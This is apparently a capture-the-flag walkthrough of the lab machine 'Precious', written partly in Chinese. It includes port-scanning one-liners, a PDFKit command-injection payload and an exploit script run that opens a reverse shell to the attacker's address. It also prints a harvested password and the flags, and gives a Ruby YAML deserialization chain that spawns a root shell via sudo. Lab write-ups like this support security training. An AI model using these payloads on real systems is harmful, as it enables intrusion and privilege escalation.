Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.189 | TCP:22,80 |
$ ip='10.10.11.189'; itf='tun0'; if nmap -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelRuby && PDFKit v0.8.6 RCE
# echo '10.10.11.189 precious.htb'>>/etc/hosts
$ whatweb http://precious.htb/ -v
http://10.10.16.28/target.txt
$ ./exiftool q6whs0fu6nzcp86yervxcasxcxqofm8k.pdf
Generated by pdfkit v0.8.6
PDFKit v0.8.6 是一个用于生成 PDF 文档的工具,但它并不是 JavaScript 版本的 PDFKit,而是 Ruby 版本的 PDFKit。它基于 wkhtmltopdf 后端工具,通过 HTML 和 CSS 来创建 PDF 文档。该版本支持 Ruby 2.5、2.6、2.7、3.0 和 3.1
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
http%20`ping -c 1 10.10.16.28`
https://www.exploit-db.com/exploits/51293
$ python3 kit.py -s 10.10.16.28 443 -w http://precious.htb -p url
Ruby to henry
ruby@precious:~$ grep -iR henry
username:henry
password:Q3c1AqGHtoI0aXAYFH
User.txt
5122df0943bba969f407138e7456440a
Privilege Escalation: Ruby YAML deserialization
henry@precious:~$ sudo -l
ruby
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/Ruby.md
在其他目录创建dependencies.yml文件,ruby程序 YAML.load(File.read("dependencies.yml"))将指向其他工作目录下的dependencies.yml
yaml
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: /bin/bash
method_id: :resolvehenry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Root.txt
822a67160b990d37b78c84fb03256922